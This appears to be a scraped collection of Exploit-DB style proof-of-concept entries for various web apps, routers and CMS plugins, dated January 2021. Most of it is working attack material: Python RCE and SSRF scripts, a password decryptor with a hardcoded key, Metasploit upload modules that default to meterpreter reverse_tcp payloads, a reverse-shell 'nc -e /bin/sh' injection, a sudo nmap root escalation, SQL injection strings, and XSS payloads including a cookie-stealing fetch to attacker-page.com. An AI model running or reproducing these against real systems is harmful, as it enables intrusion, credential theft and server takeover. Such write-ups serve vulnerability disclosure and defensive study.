ISHACK AI BOT

# Exploit Title: iBall-Baton WRA150N Rom-0 Backup - File Disclosure (Sensitive Information) # Date: 07/01/2021 # Exploit Author: h4cks1n # Vendor Homepage: iball.co.in # Version: iBall-Baton WRA150N #Tested on : Windows 7/8/8.1/10, Parrot Linux OS # The iBall-Baton router version WRA150N is vulnerable to the Rom-0 Extraction exploit. The rom-0 is a file which contains the ADSL Login credentials. In the case of this router the access to this file is unusually not encrypted. The file can be accessed by following methods: Method 1 : Type the WiFi IP address in the browser followed by /rom-0 (For example - 192.168.1.1/rom-0). The rom-0 file will be downloaded. The file is obfuscated,however.It needs to be deobfuscated using online decryptors #Online Rom-0 decryptor - http://www.routerpwn.com/zynos/ #Offline Rom-0 decryptor - https://github.com/rootkick/Rom-0-Decoder Method 2: (Linux) This full process can be automated by using threat 9's routersploit Routersploit Download- https://github.com/threat9/routersploit Download and run routersploit and use router/multi/rom-0 module

# Exploit Title: Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated) # Exploit Author: 1F98D # Original Author: Alvaro Muñoz # Date: 27 May 2020 # Vendor Hompage: https://www.sonatype.com/ # CVE: CVE-2020-10199 # Tested on: Windows 10 x64 # References: # https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype # https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype # # Nexus Repository Manager 3 versions 3.21.1 and below are vulnerable # to Java EL injection which allows a low privilege user to remotely # execute code on the target server. # #!/usr/bin/python3 import sys import base64 import requests URL='http://192.168.1.1:8081' CMD='cmd.exe /c calc.exe' USERNAME='admin' PASSWORD='password' s = requests.Session() print('Logging in') body = { 'username': base64.b64encode(USERNAME.encode('utf-8')).decode('utf-8'), 'password': base64.b64encode(PASSWORD.encode('utf-8')).decode('utf-8') } r = s.post(URL + '/service/rapture/session',data=body) if r.status_code != 204: print('Login unsuccessful') print(r.status_code) sys.exit(1) print('Logged in successfully') body = { 'name': 'internal', 'online': True, 'storage': { 'blobStoreName': 'default', 'strictContentTypeValidation': True }, 'group': { 'memberNames': [ '$\\A{\'\'.getClass().forName(\'java.lang.Runtime\').getMethods()[6].invoke(null).exec(\''+CMD+'\')}"' ] }, } r = s.post(URL + '/service/rest/beta/repositories/go/group', json=body) if 'java.lang.ProcessImpl' in r.text: print('Command executed') sys.exit(0) else: print('Error executing command, the following was returned by Nexus') print(r.text)

# Cockpit CMS 0.6.1 - Remote Code Execution # Product: Cockpit CMS (https://getcockpit.com) # Version: Cockpit CMS < 0.6.1 # Vulnerability Type: PHP Code Execution # Exploit Author: Rafael Resende # Attack Type: Remote # Vulnerability Description # Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php. Disclosed 2020-01-06. # Exploit Login POST /auth/check HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/json; charset=UTF-8 Content-Length: 52 Origin: https://example.com {"auth":{"user":"test'.phpinfo().'","password":"b"}} # Exploit Password reset POST /auth/requestreset HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/json; charset=UTF-8 Content-Length: 28 Origin: https://example.com {"user":"test'.phpinfo().'"} ## Impact Allows attackers to execute malicious codes to get access to the server. ## Fix Update to versions >= 0.6.1

# Exploit Title: Employee Record System 1.0 - Unrestricted File Upload to Remote Code Execution # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2021-01-05 # Vendor Homepage: https://www.sourcecodester.com/php/14588/employee-record-system-phpmysqli-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14588&title=Employee+Record+System+in+PHP%2FMySQLi+with+Full+Source+Code # Affected Version: Version 1 # Tested on: Parrot OS Step 1: Log in to the CMS with any valid user credentials. Step 2: Click on add Employee. Step 3: Copy a php webshell from /usr/share/webshells/php/php-reverse-shell.php and rename it to shell.php.jpg or embed a phpshellcode into an image using "exiftool -Comment='<?php system($_GET['cmd']); ?>' r0b0t.jpg, then rename the image to r0b0t.php.jpg Step 4: Fill in the required details at Add Employee, to Upload Employee Photo, browse select the shell.php.jpg / r0b0t.php.jpg from your computer. Step 5: Click upload and capture request in burpsuite. In burpsuite, find your uploaded file and rename it to a ".php" extenstion. -----------------------------32746377659244340001584064316 Content-Disposition: form-data; name="employee_photo"; filename="r0b0t.php" Content-Type: image/jpeg ------------------------------------------ Step 6: Forward the request in burpsuite and apply same technique to Upload Employee ID. step 7: Once all webshells/payloads are uploaded in both "Upload Employee Photo" & "Upload Employee ID" fields, click on ADD RECORD to create the record. Step 8: Navigate to All employees, click on view employee icon, once the page loads, start nc listener, right click on the employee icon, copy the image location and paste that in browser. You will either have a shell in nc listener or a full RCE through the uploaded image (http://localhost/record/uploads/employees_photos/gQZtGSJyYW4oijD_r0b0t.php?cmd=ls)

# Exploit Title: Curfew e-Pass Management System 1.0 - Stored XSS # Date: 2/1/2021 # Exploit Author: Arnav Tripathy # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/curfew-e-pass-management-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Windows 10/Wamp 1) Log into the application 2) Click on pass then click add a pass 3) Put <script>alert(1)</script> in the Full name parameter , rest all fill whatever you want. 4) Now go to manage passes, view the pass you just created. 5) You'll get popup of alert

# Exploit Title: CRUD Operation 1.0 - Multiple Stored XSS # Date: 4/1/2021 # Exploit Author: Arnav Tripathy # Vendor Homepage: https://egavilanmedia.com # Software Link: https://egavilanmedia.com/crud-operation-with-php-mysql-bootstrap-and-dompdf/ # Version: 1.0 # Tested on: linux / Lamp Click on add new record. Simply put <script>alert(1)</script> and so on in all parameters. Pop up should come up moment you add the record. If not , simply refresh the page, it should come up.

# Exploit Title: Life Insurance Management System 1.0 - Multiple Stored XSS # Date: 4/1/2021 # Exploit Author: Arnav Tripathy # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html # Version: 1.0 # Tested on: linux / Lamp Click on add payment once logged in. Put <script>alert(1)</script> and so on in all parameters. You will notice popup once you navigate to payments.

# Exploit Title: ECSIMAGING PACS 6.21.5 - SQL injection # Date: 06/01/2021 # Exploit Author: shoxxdj # Vendor Homepage: https://www.medicalexpo.fr/ # Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 ) # Tested on: Linux ECSIMAGING PACS Application in 6.21.5 and bellow suffers from SQLinjection vulnerability The parameter email is sensitive to SQL Injection (selected_db can be leaked in the parameters ) Payload example : /[email protected]' OR NOT 9856=9856-- nBwf&selected_db=xtp001 /[email protected]'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+&selected_db=xtp001 SQLMAP : sqlmap.py -u '<URL>/[email protected]&selected_db=xtp001' --risk=3 --level=5

# Exploit Title: Cockpit Version 234 - Server-Side Request Forgery (Unauthenticated) # Date: 08.01.2021 # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://cockpit-project.org/ # Version: v234 # Tested on: Ubuntu 18.04 #!/usr/bin/python3 import argparse import requests import sys import urllib3 import time from colorama import Fore, Style from argparse import ArgumentParser, Namespace from bs4 import BeautifulSoup """ Example scanning for internal server: python3 PoC.py --target 192.168.1.33:9090 --scan 172.16.16.16 --ports 21,22,23 Example scanning for loopback interface of server: python3 PoC.py --target 192.168.1.33:9090 Description : https://github.com/passtheticket/vulnerability-research/tree/main/cockpitProject/README.md """ def main(): dsc = "Cockpit Version 234 - sshd Service Scanning via Server-Side Request Forgery (Unauthenticated)" parser: ArgumentParser = argparse.ArgumentParser(description=dsc) parser.add_argument("--target", help="IP address of Cockpit server", type=str, required=True) parser.add_argument("--scan", help="IP address of server that will be scanned", type=str, required=False) parser.add_argument("--ports", help="Ports (example: 21,22)", type=str, required=False) args: Namespace = parser.parse_args() if args.target: target = args.target if args.scan: scan = args.scan if args.ports: ports = args.ports else: ports = "22" else: scan = "127.0.0.1" if args.ports: ports = args.ports else: ports = "22" cockpitReq(target, scan, ports) def cockpitReq(target, scan, ports): urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) portRange = ports.split(",") for unsafe in portRange: headers = { "Host": str(target), "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Authorization": "Basic dW5zYWZlOmlubGluZQ==", "X-Authorize": "", "Connection": "close", "Cookie": "cockpit=deleted", } req = requests.get("http://" + target + "/cockpit+=" + scan + ":" + unsafe + "/login", headers, verify=False) time.sleep(2) soup = BeautifulSoup(req.text, 'html.parser') responseCode = req.status_code responseTime = str(req.elapsed) if responseCode == 404: print("Cockpit server was not found!") elif responseCode == 401: if soup.title.string == "Authentication failed": print(Fore.GREEN + Style.BRIGHT + "[+] Port: "+ unsafe + " sshd service is detected!") elif soup.title.string == "Authentication failed: no-host": if responseTime > "0:00:10.000000": print(Fore.GREEN + Style.BRIGHT +"[-] Port: "+ unsafe + " is open, sshd service is not detected!") else: print(Fore.RED + Style.BRIGHT +"[-] Port: "+ unsafe + " sshd service is not detected!") else: print(Fore.RED + Style.BRIGHT +"[-] Error is occured!") print("[-] One bad day!") sys.exit(1) else: print("Something went wrong!") main()

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report def initialize(info = {}) super(update_info( info, 'Name' => 'Apache Flink File Read Vulnerability', 'Description' => %q{ This module exploits an unauthenticated directory traversal vulnerability in Apache Flink version 1.11.0 (and released in 1.11.1 and 1.11.2 as well), allowing arbitrary file read with the web server privileges }, 'Author' => [ '0rich1 - Ant Security FG Lab', # Vulnerability discovery 'Hoa Nguyen - Suncsr Team', # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2020-17519'], ['URL', 'http://www.openwall.com/lists/oss-security/2021/01/05/2'], ['URL', 'https://www.tenable.com/cve/CVE-2020-17519'] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [['', {}]], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 05 2021' )) register_options([ OptInt.new('DEPTH',[true,'Traversal Depth',12]), OptString.new('FILEPATH',[true,'The path file to read','/etc/passwd']) ]) end def run_host(ip) traversal = '..%252f' * datastore['DEPTH'] filename = datastore['FILEPATH'].gsub("/","%252f") filename = filename[1, filename.length] if filename =~ /^\// res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,'jobmanager','logs',"#{traversal}#{filename}"), }) fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200 fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero? print_status('Downloading file...') print_line("\n#{res.body}\n") fname = datastore['FILEPATH'] path = store_loot( 'apache.traversal', 'text/plain', ip, res.body, fname ) print_good("File saved in: #{path}") end end

# Exploit Title: Online Doctor Appointment System 1.0 - 'Multiple' Stored XSS # Tested on: Windows 10 # Exploit Author: Mohamed habib Smidi (Craniums) # Date: 2021-01-08 # Vendor Homepage: https://www.sourcecodester.com/php/14663/online-doctor-appointment-system-php-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14663&title=Online+Doctor+Appointment+System+in+PHP+with+Full+Source+Code # Affected Version: Version 1 # CVE : CVE-2021-25791 Step 1: Login to the doctor account in http://TARGET/doctorappointmentsystem/adminlogin.php Step 2: then Click on the username and go to profile Step 3: Click on Update profile. Step 4: Input "<script>alert("craniums")</script>" in the field First Name,Last Name and Address. Step 5: This Will trigger the payload each time you update or visit a new page.

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress wpDiscuz Unauthen File Upload Vulnerability', 'Description' => %q{ This module exploits an arbitrary file upload in the WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server. }, 'Author' => [ 'Chloe Chamberland', # Vulnerability Discovery, initial msf module 'Hoa Nguyen - SunCSR' # Metasploit Module Pull Request ], 'License' => MSF_LICENSE, 'References' => [ ['WPVDB', '10333'], ['URL', 'https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/'], ['URL','https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md'], ['URL','https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['wpDiscuz < 7.0.5', {}]], 'DisclosureDate' => 'Feb 21 2020', 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }, 'DefaultTarget' => 0)) register_options [ OptString.new('BLOGPATH',[true,'Link to the post [/index.php/2020/12/12/post1]', nil]), ] end def check check_plugin_version_from_readme('wpdiscuz','7.0.5') end def blogpath datastore['BLOGPATH'] end def find_wmusecurity_id res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, blogpath)},5) wmusecurity_id = res.body.match(/wmuSecurity":"(\w+)/).captures return wmusecurity_id end def exploit wmusecurity_id = find_wmusecurity_id[0] php_page_name = rand_text_alpha(5 + rand(5)) + '.php' data = Rex::MIME::Message.new data.add_part('wmuUploadFiles', nil, nil, 'form-data; name="action"') data.add_part(wmusecurity_id, nil, nil, 'form-data; name="wmu_nonce"') data.add_part('undefined', nil, nil, 'form-data; name="wmuAttachmentsData"') data.add_part('1', nil, nil, 'form-data; name="postId"') data.add_part('GIF8' + payload.encoded, 'image/gif', nil, "form-data; name=\"wmu_files[0]\"; filename=\"#{php_page_name}\"") post_data = data.to_s res = send_request_cgi( 'uri' => normalize_uri(target_uri.path ,'wp-admin', 'admin-ajax.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) time = Time.new year = time.year.to_s month = "%02d" % time.month regex = res.body.match(/https?:\\\/\\\/[\w\\\/\-\.:]+\.php/) wp_shell_upload = /\/\w+-\d+\.\d+\.php/.match(regex.to_s).to_s.tr('/',"") if res if res.code == 200 && res.body =~ /#{php_page_name}/ print_good("Payload uploaded as #{php_page_name}") register_files_for_cleanup(php_page_name) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, "#{peer} - Server did not answer") end print_status("Calling payload...") send_request_cgi( { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}","#{month}",wp_shell_upload)}, 5 ) end end

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info( info, 'Name' => 'Wordpress Autoptimize Authenticated File Upload', 'Description' => %q{ The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file, allowing high privilege users to upload arbitrary files, such as PHP, leading to RCE. }, 'Author' => [ 'Khanh Nguyen - Suncsr Team', # Vulnerability discovery 'Hoa Nguyen - Suncsr Team', # Metasploit module 'Thien Ngo - Suncsr Team' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2020-24948'], ['EDB', '48770'], ['WPVDB', '10372'] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }, 'Targets' => [['WP Autoptimize 2.7.6', {}]], 'DefaultTarget' => 0, 'DisclosureDate' => '2020-08-24')) register_options( [ OptString.new('USERNAME', [true, 'The WordPress password to authenticate with', nil]), OptString.new('PASSWORD', [true, 'The WordPress username to authenticate with', nil]) ]) end def check check_plugin_version_from_readme('autoptimize','2.7.7') end def ao_ccss_import_nonce(cookie) res = send_request_cgi({ 'uri' => normalize_uri(wordpress_url_backend,'options-general.php'), 'cookie' => cookie, 'vars_get' => { 'page' => 'ao_critcss' } },5) if res.code == 200 print_good("Found ao_ccss_import_nonce_code Value!") else fail_with(Failure::Unknown,'Server did not response in an expected way') end ao_ccss_import_nonce_code = res.body.match(/'ao_ccss_import_nonce', '(\w+)/).captures[0] return ao_ccss_import_nonce_code end def exploit username = datastore['USERNAME'] password = datastore['PASSWORD'] print_status("Trying to login as #{username}") cookie = wordpress_login(datastore['USERNAME'],datastore['PASSWORD']) if cookie.nil? print_error("Unable to login as #{username}") end vars = ao_ccss_import_nonce(cookie) print_status("Trying to upload payload") filename = "#{rand_text_alpha_lower(8)}.php" data = Rex::MIME::Message.new data.add_part('ao_ccss_import', nil, nil, 'form-data; name="action"') data.add_part(vars, nil, nil, 'form-data; name="ao_ccss_import_nonce"') data.add_part(payload.encoded, 'application/zip', nil, "form-data; name=\"file\"; filename=\"#{filename}\"") post_data = data.to_s print_status("Uploading payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend,'admin-ajax.php'), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data, 'cookie' => cookie }) if res.code == 200 register_files_for_cleanup(filename) else fail_with(Failure::Unknown,'Server did not response in an expected way') end print_status("Calling uploaded file #{filename}") send_request_cgi({'uri' => normalize_uri(wordpress_url_wp_content, 'uploads','ao_ccss',filename)},5) end end

# Exploit Title: EyesOfNetwork 5.3 - RCE & PrivEsc # Date: 10/01/2021 # Exploit Author: Audencia Business SCHOOL Red Team # Vendor Homepage: https://www.eyesofnetwork.com/en # Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso # Version: 5.3 #Authentified Romote Code Execution flaw > remote shell > PrivEsc # #An user with acces to "/autodiscover.php" can execute remote commande, get a reverse shell and root the targeted machine. ============================================== Initial RCE In the webpage : https://EyesOfNetwork_IP/lilac/autodiscovery.php The "target" input is not controled. It's possible tu put any commands after an "&", RCE is possible with a simple netcat commande like : & nc -e /bin/sh <IP> <PORT> ============================================== PrivEsc The EyesOfNetwork apache user can run "nmap" with sudo privilege and with NOPASSWD attribut, so it's possible to become the root user when using classic PrivEsc methode : echo 'os.execute("/bin/sh")' > /tmp/nmap.script sudo nmap --script=/tmp/nmap.script

# Exploit Title: Anchor CMS 0.12.7 - 'markdown' Stored Cross-Site Scripting # Date: 2021-10-01 # Exploit Author: Ramazan Mert GÖKTEN # Vendor Homepage: anchorcms.com # Vulnerable Software: https://github.com/anchorcms/anchor-cms/releases/download/0.12.7/anchor-cms-0.12.7-bundled.zip # Affected Version: [ 0.12.7 ] # Tested on: Windows 10 # Vulnerable Parameter Type: POST # Vulnerable Parameter: markdown # Attack Pattern: <script>prompt("RMG_XSS_PoC")</script> # Description Exploitation of vulnerability as shown below; 1-) Entering the Admin Panel ( vulnerableapplication.com/anchor/admin ) 2-) Click Create a new post button at the Posts tab ( From "vulnerableapplication.com/anchor/admin/posts " to "vulnerableapplication.com/anchor/admin/posts/add " ) 3-) Relevant payload (<script>prompt("RMG_XSS_PoC")</script>) which was defined above entering the markdown parameter then click "save" button 4-) Finally, turn back the home page then shown the triggered vulnerability # Proof of Concepts: Request; POST /anchor/admin/posts/add HTTP/1.1 Host: vulnerableapplication.com Connection: close Content-Length: 234 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept: */* Origin: https://vulnerableapplication.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://vulnerableapplication.com/anchor/admin/posts/add Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9 Cookie: anchorcms=eokq2ggm8mc4ulg2ii01a92a7d1jqvof7er085tqp9mvmdk2i3h1; _ga=GA1.2.798164571.1610282526; _gid=GA1.2.1405266792.1610282526; _gat=1 token=uyBOhuKe5lRACERuFGu9CzEqUVe9b6LgfNLFWA6rJJOjG5BPUr2XxZzUV0pMXiQn&title=xss-poc-test&markdown=%3Cscript%3Eprompt(%22RMG_XSS_PoC%22)%3C%2Fscript%3E&slug=xss-poc-test&description=&status=published&category=8&css=&js=&autosave=false Response; HTTP/1.1 200 OK Date: Sun, 10 Jan 2021 12:50:51 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Robots-Tag: noindex,nofollow Connection: close Content-Type: application/json; charset=UTF-8 Content-Length: 105 {"id":"3","notification":"Your new article was created","redirect":"\/anchor\/admin\/posts\/edit\/3"}

# Exploit Title: Cemetry Mapping and Information System 1.0 - Multiple Stored Cross-Site Scripting # Exploit Author: Mesut Cetin # Date: 2021-01-10 # Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html # Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code # Affected Version: 1.0 # Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0, Burp Suite Professional v.1.7.34 Affected parameter: "full name", "location" Proof of concept: 1. Login under admin panel, http://localhost/CemeteryMapping/admin/login.php, with default credentials janobe:admin 2. Click on "Deceased Persons" 3. Choose one of the users and click on their names to edit it 4. In the field "Full Name" insert the payload: <script>alert(document.cookie)</script> 5. Save and open the webpage under http://localhost/CemeteryMapping/index.php?q=person 6. You will receive the PHPSESSID cookie as alert. The cookie values can be redirected to attacker page by using payloads like <script src="data:application/javascript,fetch(`https://attacker-page.com/${document.cookie}`)"></script> To manipulate the "location" parameter, we will use Burp Suite. Capture the request with Burp: POST /CemeteryMapping/admin/person/controller.php?action=edit HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 149 Origin: http://localhost Connection: close Referer: http://localhost/CemeteryMapping/admin/person/index.php?view=edit&id=1 Cookie: PHPSESSID=h9smkdr8dvjhsjviugnvot261m Upgrade-Insecure-Requests: 1 PEOPLEID=1&GRAVENO=1&FNAME=JACONDIA+A.MORTEL&CATEGORIES=C&BORNDATE=07%2F04%2F1992&DIEDDATE=12%2F29%2F2003&LOCATION=BUENAVISTA+LOOC+CEMETERY<script>alert(document.cookie)</script>&save= And forward the request. The cookie values will be displayed on screen.

# Exploit Title: EyesOfNetwork 5.3 - LFI # Date: 10/01/2021 # Exploit Author: Audencia Business SCHOOL Red Team # Vendor Homepage: https://www.eyesofnetwork.com/en # Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso # Version: 5.3 The php not exclude other tools than proposed one. It's possible possible to include files when the parameter "tool_list=" is modified like that : ================================================================== POST /module/tool_all/select_tool.php HTTP/1.1 Host: 192.168.0.26 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 209 Origin: https://192.168.0.26 Connection: close Referer: https://192.168.0.26/module/tool_all/ Cookie: session_id=746751013; user_name=admin; user_id=1; user_limitation=0; group_id=1 (tool_list=FILE TO READ) page=bylistbox&host_list=127.0.0.1&tool_list=/etc/passwd&snmp_com=aze&snmp_version=2c&min_port=1&max_port=1024&username=&password=&snmp_auth_protocol=MD5&snmp_priv_passphrase=&snmp_priv_protocol=&snmp_context= ================================================================== Result a printed /etc/passwd document in the webpage : ================================================================== HTTP/1.1 200 OK Date: Sat, 09 Jan 2021 01:16:21 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3 X-Powered-By: PHP/5.4.16 Content-Length: 1529 Connection: close Content-Type: text/html; charset=UTF-8 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nagios:x:999:991::/var/spool/nagios:/sbin/nologin influxdb:x:998:998::/var/lib/influxdb:/bin/false systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin grafana:x:997:995:grafana user:/usr/share/grafana:/sbin/nologin polkitd:x:996:994:User for polkitd:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin snmptt:x:995:992:SNMP Trap Translator:/var/spool/snmptt:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:994:990::/var/lib/chrony:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin cacti:x:1000:991::/home/cacti:/bin/bash eon4apps:x:1001:991::/srv/eyesofnetwork/eon4apps:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin admin:x:1002:1000:admin:/home/admin:/bin/bash ==================================================================

# Exploit Title: OpenCart 3.0.36 - ATO via Cross Site Request Forgery # Date: 01-09-2021 # Exploit Author: Mahendra Purbia {Mah3Sec} # Vendor Homepage: https://www.opencart.com # Software Link: https://www.opencart.com/index.php?route=cms/download # Version: OpenCart CMS - 3.0.3.6 # Tested on: Kali Linux #Description: OpenCart CMS 3.0.3.6 & below versions are vulnerable to Account takeover via CSRF, related to the endpoint /account/edit. Steps to Reproduce: 1. create accounts a. victim & b. Attacker (attacker account is just for fetch the request and create a CSRf POC) 2. Now login with Attacker account and then go to account/edit and change the email and intercept this request in repeater, now create a CSRF POC of that request. 3. now in that poc change the email and email which is not registered {attacker another email}. Now save this request as a .html file. 4. now send this POC to the victim. and then the victim opens that file automatically all information is changed like name, email etc. 5. now attacker access account (with help of forgot password which came on attacker email) and fetch victim all information.

# Exploit Title: PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval # Date: 9 Jan 2021 # Exploit Author: rootabeta # Vendor Homepage: The original page, https://dmitryivanov.net/, cannot be found at this time of writing. The vulnerable software can be downloaded from https://www.softpedia.com/get/Office-tools/Diary-Organizers-Calendar/Portable-Kanban.shtml # Software Link: https://www.softpedia.com/get/Office-tools/Diary-Organizers-Calendar/Portable-Kanban.shtml # Version: Tested on: 4.3.6578.38136. All versions that use the similar file format are likely vulnerable. # Tested on: Windows 10 x64. Exploit likely works on all OSs that PBK runs on. # PortableKanBan stores credentials in an encrypted format # Reverse engineering the executable allows an attacker to extract credentials from local storage # Provide this program with the path to a valid PortableKanban.pk3 file and it will extract the decoded credentials import json import base64 from des import * #python3 -m pip install des import sys try: path = sys.argv[1] except: exit("Supply path to PortableKanban.pk3 as argv1") def decode(hash): hash = base64.b64decode(hash.encode('utf-8')) key = DesKey(b"7ly6UznJ") return key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8') with open(path) as f: try: data = json.load(f) except: #Start of file sometimes contains junk - this automatically seeks valid JSON broken = True i = 1 while broken: f.seek(i,0) try: data = json.load(f) broken = False except: i+= 1 for user in data["Users"]: print("{}:{}".format(user["Name"],decode(user["EncryptedPassword"])))

# Exploit Title: WordPress Plugin Custom Global Variables 1.0.5 - 'name' Stored Cross-Site Scripting (XSS) # Google Dork: NA # Date: 09/01/2021 # Exploit Author: Swapnil Subhash Bodekar # Vendor Homepage: # Software Link: https://wordpress.org/plugins/custom-global-variables/#developers # Version: 1.0.5 # Tested on Windows How to reproduce vulnerability: 1. Install WordPress 5.6 2. Install and activate Custom Global variables plugin. 3. Navigate to Setting >> Custom Global Variables and enter the data into the user input field. 4. Capture the request into burp suite and append the JavaScript payload which is mentioned below "><script>(1)</script><" 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.

